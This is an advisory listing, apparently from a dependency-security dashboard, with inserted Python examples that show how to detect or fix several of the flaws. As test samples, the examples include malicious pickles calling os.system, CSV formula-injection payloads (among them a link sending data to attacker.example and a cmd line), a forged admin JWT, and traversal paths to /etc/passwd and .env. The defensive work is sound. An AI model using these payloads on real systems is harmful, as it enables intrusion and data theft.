Security Advisories
Browse security advisories and track which Dependabot PRs address them.
Totals: 24,785 advisories; 1,792 with Dependabot PRs; 3,506 critical severity; 8,617 high severity.
Liferay Portal vulnerable to Stored XSS in Components portlet
GHSA-rvmf-jw8g-r35r CVE-2025-43769 MODERATE 3 months ago
Stored cross-site scripting (XSS) vulnerability in Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q3.1 through 2024.Q3.8, 2024.Q2.0 t...
maven
No PRs yet
Liferay Portal vulnerable to Reflected XSS with the referer and forward parameter
GHSA-h4m4-xp33-37mj CVE-2025-43770 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.3, 20...
maven
No PRs yet
Liferay Portal users can upload an unlimited amount of files
GHSA-84pp-qr92-95c9 CVE-2025-43762 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.1, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 202...
maven
No PRs yet
Liferay Portal's unauthenticated users can access loaded files via URL before submitting the object entry
GHSA-mm62-gwj5-j285 CVE-2025-43758 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.5, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 202...
maven
No PRs yet
Liferay Portal Reflected XSS in CKeditor 4.21.0 endpoint
GHSA-3h7r-4xxj-3mfm CVE-2025-43761 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.4, 20...
maven
npm
No PRs yet
Liferay Portal users are able to add system admin portlets to pages
GHSA-w3cr-3xw2-rp78 CVE-2025-43759 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.0 through 2024.Q3.13, 2024.Q2.0 through 202...
maven
No PRs yet
gnark is vulnerable to signature malleability in EdDSA and ECDSA due to missing scalar checks
GHSA-95v9-hv42-pwrj CVE-2025-57801 HIGH 3 months ago
In version before, `sig.s` is used without asserting `0 ≤ S < order` in the `Verify` function in [eddsa.go](https://github.com/Consensys/gnark/blob/d9a423...
go
No PRs yet
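As an added example (not gnark's code, and not EdDSA or ECDSA themselves), the toy Schnorr-style scheme below over a small prime-order group shows what the missing `0 ≤ S < order` assertion buys an attacker: the group has order q, so any s' ≡ s (mod q) satisfies the verification equation and s + q is a second valid signature for the same message under a verifier that does no range check. The hardened verifier rejects it before touching the group math. The parameters, key derivation and deterministic nonce are constructed for this example.

```python
import hashlib

# Toy Schnorr group, constructed for this example only: p = 2q + 1, q prime,
# G generates the order-q subgroup. Far too small for real use; the scalar
# range check, not the parameters, is the point.
P = 2039
Q = 1019
G = 4
assert pow(G, Q, P) == 1 and G != 1  # G really has order Q


def _challenge(*parts: bytes) -> int:
    """Hash the parts to a scalar in [0, Q)."""
    return int.from_bytes(hashlib.sha256(b"".join(parts)).digest(), "big") % Q


def keygen(seed: bytes):
    """Derive a private scalar x in [1, Q) from a seed; return (x, y = G^x)."""
    x = _challenge(b"key", seed) or 1
    return x, pow(G, x, P)


def sign(x: int, msg: bytes):
    """Schnorr-style signature (r, s) with a deterministic nonce so runs are reproducible."""
    k = _challenge(b"nonce", x.to_bytes(4, "big"), msg) or 1
    r = pow(G, k, P)
    e = _challenge(r.to_bytes(4, "big"), msg)
    s = (k + x * e) % Q
    return r, s


def verify_without_range_check(y: int, msg: bytes, sig) -> bool:
    """The flawed verifier: checks the group equation G^s == r * y^e but never
    asserts 0 <= s < Q, so any s' == s (mod Q) is also accepted."""
    r, s = sig
    e = _challenge(r.to_bytes(4, "big"), msg)
    return pow(G, s, P) == (r * pow(y, e, P)) % P


def scalar_is_canonical(s: int, order: int) -> bool:
    """The assertion the advisory says was missing: 0 <= S < order."""
    return 0 <= s < order


def verify(y: int, msg: bytes, sig) -> bool:
    """Hardened verifier: reject non-canonical scalars before doing any group math."""
    r, s = sig
    if not (1 <= r < P) or not scalar_is_canonical(s, Q):
        return False
    return verify_without_range_check(y, msg, sig)


def malleate(sig):
    """Produce a second, distinct signature for the same message by adding the group
    order to s. G has order Q, so G^(s+Q) == G^s and the group equation still holds."""
    r, s = sig
    return r, s + Q


if __name__ == "__main__":
    x, y = keygen(b"alice")
    msg = b"transfer 10"
    sig = sign(x, msg)
    forged = malleate(sig)
    print("original accepted (flawed):  ", verify_without_range_check(y, msg, sig))
    print("malleated accepted (flawed): ", verify_without_range_check(y, msg, forged))
    print("malleated accepted (checked):", verify(y, msg, forged))
```

For a real curve the same rule applies to the scalar S of an EdDSA signature and to both r and s of an ECDSA signature: compare the decoded integer against the order before any modular reduction, and in a circuit constrain the range rather than reduce. Malleability matters wherever a signature's bytes are used as an identifier (transaction IDs, replay caches, on-chain nullifiers), since the second encoding slips past anything keyed on the first.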
Liferay Portal Reflected Cross-Site Scripting Vulnerability via PortalUtil.escapeRedirect
GHSA-fvqv-593q-qp8r CVE-2025-43760 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.4, 20...
maven
No PRs yet
Liferay Portal User Enumeration Vulnerability via the Create Account Page
GHSA-xwc5-q44v-p6gg CVE-2025-43751 MODERATE 3 months ago
User enumeration vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2024.Q4.0 through 2024.Q4.7, 2024.Q3.0 through 2024.Q3.13...
maven
No PRs yet
Rust XCB `xcb::Connection::connect_to_fd*` functions violate I/O safety
GHSA-655h-hg88-5qmf LOW 3 months ago
The API of `xcb::Connection` has constructors which allow an arbitrary `RawFd` to be used as a socket connection. On either failure of these constr...
cargo
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils._config_module.load_config
GHSA-vv6j-3g6g-2pvj MODERATE 3 months ago
### Summary
Using the torch.utils._config_module.load_config function, a PyTorch library function, to execute a remote pickle file.
### Details...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.jit.unsupported_tensor_ops.execWrapper
GHSA-vr7h-p6mm-wpmh MODERATE 3 months ago
### Summary
Using the torch.jit.unsupported_tensor_ops.execWrapper function, a PyTorch library function, to execute a remote pickle file.
### D...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils.data.datapipes.utils.decoder.basichandlers
GHSA-h3qp-7fh3-f8h4 MODERATE 3 months ago
### Summary
Using the torch.utils.data.datapipes.utils.decoder.basichandlers function, a PyTorch library function, to execute a remote pickle fi...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils.collect_env.run
GHSA-f745-w6jp-hpxx MODERATE 3 months ago
### Summary
Using the torch.utils.collect_env.run function, a PyTorch library function, to execute a remote pickle file.
### Details
The attac...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression
GHSA-f4x7-rfwp-v3xw MODERATE 3 months ago
### Summary
Using the torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function, a PyTorch library function, to execu...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch._dynamo.guards.GuardBuilder.get
GHSA-86cj-95qr-2p4f MODERATE 3 months ago
### Summary
Using the torch._dynamo.guards.GuardBuilder.get function, a PyTorch library function, to execute a remote pickle file.
### Details
...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils.bottleneck.__main__.run_cprofile
GHSA-4r9r-ch6f-vxmx MODERATE 3 months ago
### Summary
Using the torch.utils.bottleneck.__main__.run_cprofile function, a PyTorch library function, to execute a remote pickle file.
### ...
pypi
No PRs yet
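The seven Picklescan advisories above share one shape: picklescan matches the module/name pairs a pickle would import against a denylist, and each advisory names a PyTorch callable that reaches code execution but was not on that list. As an added example (not picklescan's code), the scanner below walks a pickle's opcode stream with `pickletools.genops`, never unpickling, and reports any `GLOBAL`/`STACK_GLOBAL` reference found on a constructed denylist seeded with the seven callables named above. The malicious sample pickles are hand-assembled here so no PyTorch install is needed.

```python
import io
import pickle
import pickletools

# Constructed denylist for this example (not picklescan's own table): the seven
# PyTorch callables named in the advisories above plus a few classic gadgets.
DANGEROUS_GLOBALS = frozenset({
    "torch.utils._config_module.load_config",
    "torch.jit.unsupported_tensor_ops.execWrapper",
    "torch.utils.data.datapipes.utils.decoder.basichandlers",
    "torch.utils.collect_env.run",
    "torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression",
    "torch._dynamo.guards.GuardBuilder.get",
    "torch.utils.bottleneck.__main__.run_cprofile",
    "os.system",
    "subprocess.Popen",
    "builtins.exec",
    "builtins.eval",
})

STRING_OPCODES = {"STRING", "BINSTRING", "SHORT_BINSTRING",
                  "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes):
    """List every 'module.qualname' a pickle would import, by walking its opcodes with
    pickletools.genops. Nothing is unpickled, so nothing executes. STACK_GLOBAL takes its
    module and name from the two most recently pushed strings, which this tracks as a
    simplification of the real stack."""
    found = []
    recent_strings = []
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if op.name == "GLOBAL":                      # protocol 0-3: "module name" as one arg
            module, _, name = arg.partition(" ")
            found.append(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            found.append(f"{recent_strings[-2]}.{recent_strings[-1]}")
        elif op.name in STRING_OPCODES:
            recent_strings.append(arg)
    return found


def scan(data: bytes):
    """Return the dangerous callables referenced by `data`, in order of appearance."""
    return [g for g in referenced_globals(data) if g in DANGEROUS_GLOBALS]


def _proto0_reduce(module: str, name: str, arg: str) -> bytes:
    """Hand-assemble a protocol-0 pickle that would call module.name(arg) on load."""
    return f"c{module}\n{name}\n(S'{arg}'\ntR.".encode()


def _proto4_reduce(module: str, name: str, arg: str) -> bytes:
    """Same call with protocol-4 opcodes: SHORT_BINUNICODE x2, STACK_GLOBAL, arg, TUPLE1, REDUCE."""
    def short_unicode(s: str) -> bytes:
        b = s.encode()
        return b"\x8c" + bytes([len(b)]) + b
    return (b"\x80\x04" + short_unicode(module) + short_unicode(name) + b"\x93"
            + short_unicode(arg) + b"\x85" + b"R" + b".")


# Constructed samples: what a malicious "model file" looks like at the opcode level.
SAMPLES = {
    "classic_os_system": _proto0_reduce("os", "system", "id"),
    "torch_collect_env_run": _proto0_reduce("torch.utils.collect_env", "run", "id"),
    "torch_guardbuilder_get": _proto4_reduce("torch._dynamo.guards", "GuardBuilder.get",
                                             "import os; os.system('id')"),
    "benign_weights": pickle.dumps({"weights": [0.1, 0.2, 0.3]}),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        print(f"{label:24s} -> {scan(blob) or 'clean'}")
```

The denylist approach is exactly why seven separate advisories were needed: every newly found gadget has to be added after the fact. Where you control the loader, a restricted `Unpickler.find_class` allowlist or a weights format that cannot carry callables (safetensors) removes the race entirely; the scanner above is for triage of files you did not produce.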
UnoPim has CSV Injection on Quick Export feature
GHSA-74rg-6f92-g6wx CVE-2025-55745 LOW 3 months ago
### Summary
Description:
`CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a C...
packagist
No PRs yet
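As an added example (not UnoPim's code), a quick-export style CSV writer that neutralizes formula-leading cells before the file reaches a spreadsheet. The rows are constructed, and the apostrophe prefix and the exemption for plain numbers are design choices of this example rather than anything the advisory prescribes.

```python
import csv
import io
import re

# A cell beginning with any of these is parsed as a formula by Excel/LibreOffice;
# tab and CR are included because they are trimmed before the check is made.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
_PLAIN_NUMBER = re.compile(r"[-+]?\d+(\.\d+)?")


def neutralize_cell(value) -> str:
    """Prefix formula-like text with an apostrophe so spreadsheets treat it as text.
    Plain numbers such as -12.5 are left alone so numeric columns stay numeric."""
    s = "" if value is None else str(value)
    if _PLAIN_NUMBER.fullmatch(s):
        return s
    if s.startswith(FORMULA_TRIGGERS):
        return "'" + s
    return s


def export_rows(rows, fieldnames) -> str:
    """Write rows to CSV with every cell neutralized and quoted; the csv module doubles
    embedded quotes, which closes the classic quote break-out as well."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()


# Constructed product rows, as an attacker-controlled PIM record could hold them.
SAMPLE_ROWS = [
    {"sku": "A-100", "name": "Plain product", "price": "-12.5"},
    {"sku": "=HYPERLINK(\"http://attacker.example/?\"&A1,\"click\")", "name": "Exfil via link", "price": "9"},
    {"sku": "B-200", "name": "=cmd|' /C calc'!A0", "price": "+1"},
    {"sku": "@SUM(1+1)", "name": "\t=1+1", "price": "3"},
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS, ["sku", "name", "price"]))
```

The apostrophe stays visible in non-spreadsheet consumers of the file, so some exports neutralize only on human-facing downloads or prefix a tab instead; whichever you pick, it has to happen at write time, because the cell content came from another user.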
UnoPim has Broken Access Control
GHSA-8p2f-fx4q-75cx CVE-2025-55741 HIGH 3 months ago
### Summary
In Unopim, it is possible to create roles and choose the privileges. However, users without the “Delete” privilege for Products cannot ...
packagist
No PRs yet
Dpanel has an arbitrary file read vulnerability
GHSA-gcqf-pxgg-gw8q CVE-2025-53363 MODERATE 3 months ago
### Summary
Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface. When logged in to Dpanel, this interface can ...
go
No PRs yet
JeecgBoot SQL Injection Vulnerability
GHSA-gj8w-ffq9-6828 CVE-2025-51825 MODERATE 3 months ago
JeecgBoot versions from 3.4.3 up to 3.8.0 were found to contain a SQL injection vulnerability in the /jeecg-boot/online/cgreport/head/parseSql endp...
maven
No PRs yet
Bouncy Castle for Java has Out-of-Bounds Write Vulnerability
GHSA-g6rx-6wfx-gj74 CVE-2025-9340 LOW 3 months ago
Out-of-bounds Write vulnerability in Legion of the Bouncy Castle Inc. Bouncy Castle for Java bc-fips on All (API modules). This vulnerability is as...
maven
No PRs yet
Bouncy Castle for Java has Uncontrolled Resource Consumption Vulnerability
GHSA-jfcv-jv9g-2vx2 CVE-2025-9341 MODERATE 3 months ago
Uncontrolled Resource Consumption vulnerability in Legion of the Bouncy Castle Inc. Bouncy Castle for Java FIPS bc-fips on All (API modules) allows...
maven
No PRs yet
Liferay Portal's Unlimited File Upload Could Result in DoS
GHSA-qpp6-f3qj-rggq CVE-2025-43752 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.4, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 202...
maven
No PRs yet
Liferay Portal Reflected Cross-Site Scripting Vulnerability via Form Container
GHSA-r367-q549-pgr5 CVE-2025-43753 LOW 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.3.32 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.7,...
maven
No PRs yet
hippo4j Includes Hard Coded Secret Key in JWT Creation
GHSA-48cg-9c55-j2q7 CVE-2025-51606 HIGH 3 months ago
hippo4j 1.0.0 to 1.5.0, uses a hard-coded secret key in its JWT (JSON Web Token) creation. This allows attackers with access to the source code or ...
maven
No PRs yet
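As an added example (not hippo4j's code), what a hard-coded HMAC key costs: anyone who reads it from the source can mint a token with any claims the server will accept, and the only fix is a key that exists per deployment and lives outside the repository. The key value, claims and helper names below are constructed.

```python
import base64
import hashlib
import hmac
import json
import secrets


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_hs256(claims: dict, key: bytes) -> str:
    """Produce a compact HS256 JWT; whoever holds `key` can mint any claims at all."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":"), sort_keys=True).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token: str, key: bytes):
    """Return the claims if `token` is a valid HS256 token under `key`, else None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":          # pin the algorithm; never let the token choose
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        return None
    return json.loads(_b64url_decode(p))


# The anti-pattern: a key literal committed with the source. Constructed value, not hippo4j's.
HARD_CODED_KEY = b"change-me-hippo4j-demo"


def forge_admin_token(leaked_key: bytes) -> str:
    """What anyone with the repository (or a decompiled jar) can do once the key is known."""
    return mint_hs256({"sub": "attacker", "roles": ["admin"]}, leaked_key)


def parse_signing_key(hex_from_env) -> bytes:
    """Fix: load the key from deployment config, and insist on >= 256 bits for HS256."""
    if not hex_from_env:
        raise ValueError("JWT signing key not configured; generate one with fresh_key().hex()")
    key = bytes.fromhex(hex_from_env)
    if len(key) < 32:
        raise ValueError("HS256 key must be at least 32 random bytes")
    return key


def fresh_key() -> bytes:
    """Generate a per-deployment key; store it in a secret manager or env var, never in git."""
    return secrets.token_bytes(32)


if __name__ == "__main__":
    forged = forge_admin_token(HARD_CODED_KEY)
    print("server with hard-coded key accepts forged token:", verify_hs256(forged, HARD_CODED_KEY))
    print("server with its own key rejects it:", verify_hs256(forged, fresh_key()))
```

Rotating the key invalidates every outstanding token, which is the intended effect after a leak; a deployment that cannot tolerate that should already be issuing short-lived tokens.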
Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs
GHSA-9gjj-6gj7-c4wj CVE-2025-57751 HIGH 3 months ago
Dear Maintainers,
I am writing to you on behalf of the Tencent AI Sec. We have identified a potential vulnerability in one of your products and wou...
pypi
No PRs yet
Mattermost has Potential Server Crash due to Unvalidated Import Data
GHSA-h469-4fcf-p23h CVE-2025-8402 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.10.x <= 10.10.0, 10.9.x <= 10.9.3 fail to validate import data which ...
go
No PRs yet
Liferay Portal Username Enumeration Vulnerability
GHSA-x7p4-v8mj-6fxx CVE-2025-43754 MODERATE 3 months ago
Username enumeration vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2024.Q4.0 through 2024.Q4.7, 2024.Q3.0 through 2024.Q...
maven
No PRs yet
Mattermost Fails to Sanitize File Names
GHSA-pj6f-rc94-gw53 CVE-2025-6465 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 10.10.x <= 10.10.0, 10.9.x <= 10.9.3 fail to sanitize file names which allows users with fi...
go
No PRs yet
Liferay Portal Reflected Cross-Site Scripting Vulnerability via snippet Parameter
GHSA-q2gv-w583-f2vq CVE-2025-43756 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.15, 2025.Q2.0 throu...
maven
No PRs yet
Liferay Portal Stored Cross-Site Scripting Vulnerability via GroupPagesPortlet_type Parameter
GHSA-58cq-8wm2-6m87 CVE-2025-43755 MODERATE 3 months ago
A stored cross-site scripting vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q2.0, 2025.Q1.0 through 2025.Q1.1...
maven
No PRs yet
@musistudio/claude-code-router has improper CORS configuration
GHSA-8hmm-4crw-vm2c CVE-2025-57755 HIGH 3 months ago
### Impact
Due to improper Cross-Origin Resource Sharing (CORS) configuration, there is a risk that user API Keys or equivalent credentials may be ...
npm
No PRs yet
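As an added example (not the claude-code-router code), the two CORS policies side by side as pure functions of the request headers: reflecting the `Origin` header while also sending `Access-Control-Allow-Credentials: true` lets any site the user has open read authenticated responses, and a local service that returns API keys in such a response hands them to that site. The allowlist, origins and sample request are constructed.

```python
from urllib.parse import urlsplit

# Constructed allowlist: the local UI and one operator dashboard. Exact origins only.
ALLOWED_ORIGINS = frozenset({"http://localhost:3456", "https://admin.example.test"})


def cors_headers_reflecting(request_headers: dict) -> dict:
    """The misconfiguration: echo whatever Origin arrived and allow credentials."""
    origin = request_headers.get("Origin")
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers_allowlisted(request_headers: dict, allowed=ALLOWED_ORIGINS) -> dict:
    """Fix: answer only exact allowlisted origins, and always Vary on Origin so a cache
    never serves one origin's ACAO header to another."""
    origin = request_headers.get("Origin")
    if origin is None or origin == "null":           # sandboxed/file origins are never allowed
        return {}
    parts = urlsplit(origin)
    if parts.path or parts.query or parts.fragment:  # an Origin is scheme://host[:port], nothing more
        return {}
    if f"{parts.scheme}://{parts.netloc}".lower() not in allowed:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


def readable_by(page_origin: str, response_headers: dict) -> bool:
    """Browser rule for a credentialed cross-origin fetch: the body is exposed only if ACAO is
    exactly the page's origin (a literal '*' does not count with credentials) and ACAC is 'true'."""
    return (response_headers.get("Access-Control-Allow-Origin") == page_origin
            and response_headers.get("Access-Control-Allow-Credentials") == "true")


# Constructed request, as a page at https://evil.example would make a browser send with
# fetch("http://localhost:3456/api/config", {credentials: "include"}).
ATTACKER_REQUEST = {"Origin": "https://evil.example", "Cookie": "session=abc123"}

if __name__ == "__main__":
    print("reflecting config leaks to evil.example:",
          readable_by("https://evil.example", cors_headers_reflecting(ATTACKER_REQUEST)))
    print("allowlisted config leaks to evil.example:",
          readable_by("https://evil.example", cors_headers_allowlisted(ATTACKER_REQUEST)))
```

Exact-match against a fixed set is the whole fix; suffix or regex matching on the host is where `admin.example.test.evil.example` style bypasses come from. Tools that listen on localhost need this as much as public services, because every tab in the browser can reach localhost.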
vite-plugin-static-copy files not included in `src` are possible to access with a crafted request
GHSA-pp7p-q8fx-2968 CVE-2025-57753 MODERATE 3 months ago
### Summary
Files not included in `src` were possible to access with a crafted request.
### Impact
Only apps explicitly exposing the Vite dev ser...
npm
4 Dependabot PRs
sha.js is missing type checks leading to hash rewind and passing on crafted data
GHSA-95m3-7q98-8xr5 CVE-2025-9288 CRITICAL 3 months ago
### Summary
This is the same as [GHSA-cpq7-6gpm-g9rc](https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc) but just ...
npm
3 Dependabot PRs
cipher-base is missing type checks, leading to hash rewind and passing on crafted data
GHSA-cpq7-6gpm-g9rc CVE-2025-9287 CRITICAL 3 months ago
### Summary
This affects e.g. `create-hash` (and `crypto-browserify`), so I'll describe the issue against that package
Also affects `create-hmac` ...
npm
No PRs yet
vLLM has remote code execution vulnerability in the tool call parser for Qwen3-Coder
GHSA-79j6-g2m3-jgfw CVE-2025-9141 HIGH 3 months ago
### Summary
An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get t...
pypi
No PRs yet
go-viper's mapstructure May Leak Sensitive Information in Logs When Processing Malformed Data
GHSA-2464-8j7c-4cjm MODERATE 3 months ago
### Summary
Use of this library in a security-critical context may result in leaking sensitive information, if used to process sensitive fields.
...
go
No PRs yet
UnoPim vulnerable to CSRF on Product edit feature and creation of other types
GHSA-287x-6r2h-f9mw CVE-2025-55744 MODERATE 3 months ago
### Summary
Some of the endpoints of the application are vulnerable to Cross-Site Request Forgery (CSRF).
| Method | Endpoint | Status | Reason |
...
packagist
No PRs yet
UnoPim vulnerable to remote code execution through Arbitrary File upload
GHSA-v22v-xwh7-2vrm CVE-2025-55743 HIGH 3 months ago
### Summary:
Affected Functionality: **Image upload at User creation**
Endpoint: `/admin/settings/users/create`
### Details
The image upload at th...
packagist
No PRs yet
UnoPim has Stored Cross-site Scripting vulnerability in user creation functionality
GHSA-xr97-25v7-hc2q CVE-2025-55742 MODERATE 3 months ago
### Summary
Affected Functionality: User creation
Endpoint: `/admin/settings/users/create`
### Details
https://github.com/unopim/unopim/blob/a0dc8...
packagist
No PRs yet
vllm API endpoints vulnerable to Denial of Service Attacks
GHSA-rxc4-3w6r-4v47 CVE-2025-48956 HIGH 3 months ago
### Summary
A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP...
pypi
No PRs yet
Mattermost Fails to Sanitize Path Traversal Sequences
GHSA-x67c-v8jr-p29r CVE-2025-8023 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.9.x <= 10.9.2 fail to sanitize path traversal sequences in template ...
go
No PRs yet
Mattermost Server SSRF Vulnerability via the Agents Plugin
GHSA-vqwh-5jhh-vc9p CVE-2025-47700 LOW 3 months ago
Mattermost Server versions 10.5.x <= 10.5.9 utilizing the Agents plugin fail to reject empty request bodies, which allows users to trick users into ...
go
No PRs yet
Mattermost Fails to Properly Validate Team Role Modification
GHSA-4276-cm8c-788h CVE-2025-53971 LOW 3 months ago
Mattermost versions 10.5.x <= 10.5.8, 9.11.x <= 9.11.17 fail to properly validate authorization for team scheme role modifications which allows Tea...
go
No PRs yet
Mattermost Does Not Sanitize the Team Invite ID
GHSA-qj47-w9f2-qg44 CVE-2025-47870 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.9.x <= 10.9.2 fail to sanitize the team invite ID in the POST /api/v...
go
No PRs yet
Mattermost Lack of Access Control Validation
GHSA-pwvr-grqg-7vp2 CVE-2025-49810 LOW 3 months ago
Mattermost versions 10.5.x <= 10.5.8 fail to validate access controls at time of access, which allows a user to read a thread via AI posts
go
No PRs yet
Mattermost Fails to Validate Remote Cluster Upload Sessions
GHSA-q453-638c-h4mr CVE-2025-49222 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.9.x <= 10.9.2, 10.10.x <= 10.10.0 fail to validate upload types in re...
go
No PRs yet
Mattermost Fails to Validate File Paths
GHSA-gq3r-5833-5532 CVE-2025-36530 MODERATE 3 months ago
Mattermost versions 10.9.x <= 10.9.1, 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17 fail to properly validate file paths during plugin impo...
go
No PRs yet
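The vite-plugin-static-copy entry above (files outside `src` reachable with a crafted request) and the two Mattermost entries (path traversal sequences in template paths, unvalidated file paths during plugin import) are all containment failures: a client-supplied path is joined to a base directory without checking that the result stays inside it. As an added example (not any of those projects' code), one resolver that handles the usual bypasses, plus an `allowed_for_copy` gate modelling an assumed "only these sub-directories" configuration; the base directory and requests are constructed.

```python
import posixpath
from urllib.parse import unquote


def resolve_within(base_dir: str, requested: str):
    """Map a client-supplied path onto base_dir; return the normalised absolute path if it
    stays inside base_dir, else None. Pure string logic (POSIX paths) so it runs offline;
    on a real filesystem also resolve symlinks with os.path.realpath on both sides."""
    rel = unquote(requested)                      # decode exactly once, before any checks
    if "\x00" in rel or "\\" in rel:              # NUL truncation; backslash separators on Windows
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, rel.lstrip("/")))
    # The prefix check must include the separator: "/srv/public2" starts with "/srv/public".
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


def allowed_for_copy(base_dir: str, requested: str, allowed_subdirs) -> bool:
    """Second gate modelling a 'serve/copy only these sources' config (assumed semantics):
    the resolved path must also fall under one of the configured sub-directories."""
    resolved = resolve_within(base_dir, requested)
    if resolved is None:
        return False
    base = posixpath.normpath(base_dir)
    return any(resolved.startswith(posixpath.join(base, sub) + "/") for sub in allowed_subdirs)


# Constructed requests, the kind a crafted dev-server URL or an import manifest would carry.
BASE = "/srv/app/public"
REQUESTS = [
    "assets/logo.png",
    "/assets/logo.png",
    "../../etc/passwd",
    "assets/%2e%2e/%2e%2e/.env",
    "../public2/secret.txt",
    "assets/logo.png%00.jpg",
    "",
]

if __name__ == "__main__":
    for req in REQUESTS:
        print(f"{req!r:32} -> {resolve_within(BASE, req)}")
```

Decode once, normalise, then prefix-check with the separator included; reversing that order (check, then decode) is how `%2e%2e` and double-encoded sequences get through. On a live filesystem add `os.path.realpath` so a symlink inside the base cannot point outside it, and treat an empty or `.` request as "the base directory itself", which is usually not something you want to serve either.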
wong2 mcp-cli Command Injection Vulnerability
GHSA-p6rm-483j-37jf CVE-2025-9262 LOW 3 months ago
A flaw has been found in wong2 mcp-cli 1.13.0. Affected is the function redirectToAuthorization of the file /src/oauth/provider.js of the component...
npm
No PRs yet